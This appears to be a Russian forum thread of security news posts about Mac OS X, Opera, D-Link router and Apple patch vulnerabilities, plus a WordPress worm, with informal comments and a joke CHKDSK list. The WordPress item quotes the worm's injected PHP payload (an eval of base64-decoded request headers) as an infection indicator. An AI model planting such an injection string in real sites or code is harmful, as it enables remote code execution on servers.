Специалист по безопасности Чарли Миллер, известный тем, что ранее уже находил бреши в безопасности операционной системы Apple, рассказал о том, что ему удалось найти еще 20 так называемых zero day ошибок в системе защиты Mac OS X.

По словам Миллера, уязвимости нашлись весьма просто: в течение продолжительного времени Миллер подавал на вход различным приложениям «испорченные» данные (чаще всего это были файлы, в которых был изменен всего один бит), а затем изучал реакцию системы. В результате своих экспериментов хакер смог выделить 20 новых уязвимостей, позволяющих удаленно контролировать взломанный компьютер.

Как утверждает сам Миллер, сегодня Mac OS X входит в число наиболее уязвимых операционных систем. На данный момент ее пользователи «находятся в большей безопасности, но менее защищены» — и все из-за того, что пока авторы вредоносного ПО почти не обращают внимания на малочисленную армию поклонников продуктов Apple.

«Пользоваться Mac OS X – почти то же самое, что жить на ферме в стране, где нет замков на дверях, — рассказал хакер в своем интервью изданию Heise Security. — Использовать Windows — значит обитать в доме с зарешеченными окнами, находящемся в неблагополучном районе города».

Миллер более подробно расскажет о найденных уязвимостях в своем выступлении «Испытание 4 приложений с помощью 5 строк кода на Python» на конференции CanSecWest, которая будет проходить в Канаде на следующей неделе.

источник
++

Уважаемый крап, пишу тебе с таксафона, ибо мой любимый браузер более не безопасен.

В браузере Opera обнаружена уязвимость высокой степени опасности, которая может использоваться злоумышленниками для получения полного контроля над системой жертвы. Уязвимость существует из-за ошибки при обработке HTTP заголовка Content-Length. Злоумышленник может заманить пользователя на специально сформированный сайт, отправить браузеру специально сформированный HTTP заголовок и аварийно завершить работу браузера или выполнить произвольный код на системе с привилегиями пользователя, запустившего браузер Opera. В публичном доступе находится демонстрационный код, который приводит к аварийному завершению работы браузера.

Закрыть браузер не есть самое страшное что можно сделать, выполнение произвольного кода от юзера запустившего оперу есть зло.

Повар предупреждает операстов не пользоваться оперой до появления заплатки(время кстати пошло), либо не посещать незнакомые сайты и сайты с всплывающей рекламой. Антивирусы могут не помочь, их фактически можно деактивировать ли нейтролизовать через эту дырку.

Зы в данный момент из популярных браузеров не осталось ниодного не имеющего не закрытые уязвимости. Интернет можно закрывать.

Компания D-Link признала существование уязвимостей в некоторых моделях маршрутизаторов, и выпустила обновленные прошивки, позволяющие устранить обнаруженные проблемы. Их причиной стала небезопасная реализация управляющего протокола Home Network Administration Protocol (HNAP), что давало возможность изменения настроек устройства неавторизованным пользователям.

Производителю понадобилось несколько дней, чтобы отреагировать на сообщение об уязвимости, появившееся на сайте SourceSec Security Research. Одновременно с этой информацией в сеть была выложена программа HNAP0wn, с помощью которой можно перехватить удаленное управление маршрутизатором с такой уязвимостью… Мнения самой компании и SourceSec о масштабе проблемы разошлись. Хакеры полагают, что под подозрением находятся все маршрутизаторы, которые выпускались D-Link с 2006 года, тогда как производитель подтвердил уязвимость только для нескольких моделей.

В официальном перечне уязвимого оборудования оказались маршрутизаторы DIR-855 (версия A2), DIR-655 (версии с A1 до A4) и DIR-635 (версия B). Затронуты оказались также три модели, выпуск которых уже прекращен – это DIR-615 (версии B1, B2 и B3), DIR-635 (версия A) и DI-634M (версия B1). Для всех вышеуказанных моделей на фирменном сайте поддержки доступны исправленные прошивки.

Apple выпустила кумулятивное обновление, закрывающее 58 уязвимостей операционной системы Mac OS X и ее компонентов.

Более половины исправлений касается дефектов, дающих злоумышленникам доступ к несанкционированному исполнению кода. Речь идет об уязвимостях в 37 компонентах Mac OS X — таких, например, как сетевой протокол AFP, открытый веб-сервер Apache, графическая подсистема CoreGraphics, настольная поисковая система Spotlight, медиапроигрыватель QuickTime и прочих.

По сообщению Apple, ошибка в Apache может привести к атаке с использованием межсайтового скриптинга, а проблема в CoreGraphics позволяет вредоносному PDF-файлу предоставлять возможность для удаленной атаки за счет переполнения буфера.

Пять исправлений имеют отношение только к Snow Leopard. Они закрывают уязвимости обрабатывающего H.264-видеофайлы компонента CoreMedia и работающего с TIFF-изображениями фреймворка ImageIO, а также ошибки ядра и служб Mac OS X.

Кроме Apache также были обновлены и другие компоненты с открытым исходным кодом: Fetchmail, IPSec, LibXML, OpenLDAP, OpenSSH, PHP, RADIUS и Subversion.

Пакет исправлений можно скачать со специального раздела сайта Apple. Также он входит в состав параллельно выпущенной Mac OS X 10.6.2.

источник

С запозданием новость ога =)

Через две с небольшим недели после релиза операционной системы Mac OS X 10.6 Snow Leopard компания Apple выпустила первое обновление для этой программной платформы.

В состав апдейта Mac OS X 10.6.1 включены исправления обнаруженных ошибок и последняя версия плагина Adobe Flash Player с индексом 10.0.32.18. В плеере устранено несколько опасных уязвимостей, некоторые из которых теоретически могут использоваться для получения несанкционированного доступа к удаленному компьютеру и последующего выполнения на нем произвольных операций. Для организации атаки необходимо вынудить пользователя посетить сформированную специальным образом веб-страницу.

Обновление также содержит дополнения, улучшающие совместимость с некоторыми моделями принтеров и 3G-модемами Sierra Wireless. Кроме того сообщается об устранении ошибки, приводившей к внезапной остановке воспроизведения DVD.

Загрузить обновление для Mac OS X 10.6.1 можно либо через встроенные в операционную систему средства обновления, либо через сайт компании Apple.

А ты уже обновил свой мак, айраб? =)

Месяц назад стало известно о новой критической уязвимости в WordPress 2.8.3, позволяющей легко изменить администраторский пароль в удалённом режиме. После этого вышел WordPress 2.8.4, устраняющий эту уязвимость. Однако, как оказалось, далеко не все блогеры следят за обновлениями.

В эти выходные разразилась настоящая эпидемия нового вируса, поражающего блоги на движке WordPress 2.8.3 и более ранних версий в ветке 2.8.

Червь регистрируется в блоге, запускает вредоносный код через структуру permalink и делает себя вторым админом, потом запускает скрипт для стирания себя со страницы пользователей и начинает добавлять спам и ссылки на вредоносный контент в архивные топики.

Присутствие вредителя довольно сложно обнаружить сразу, тем более если он ещё ничего не опубликовал. Для этого нужно проверить фид permalinks/rss на присутствие следующего кода.

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

или
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

или ошибки

‘error on line 22 at column 71: xmlParseEntityRef: no name wordpress’

Если есть такой код или фид сломан, то блог инфицирован.

Процедура удаления червя представляет собой нетривиальную задачу .

Источник

Обновляться!

1. открываем командную строку(пуск — выполнить — cmd и нажать выполнить)
2. пишем CHKDSK <буква диска:> /r и жмём интер
3. В ходе проверки вашего диска, открываем диспечер задач(ваши любимые кнопки должны помочь CTRL+ALT+DEL)
4. ???????
5. Профит

Зы. Скриншоты в студиу =)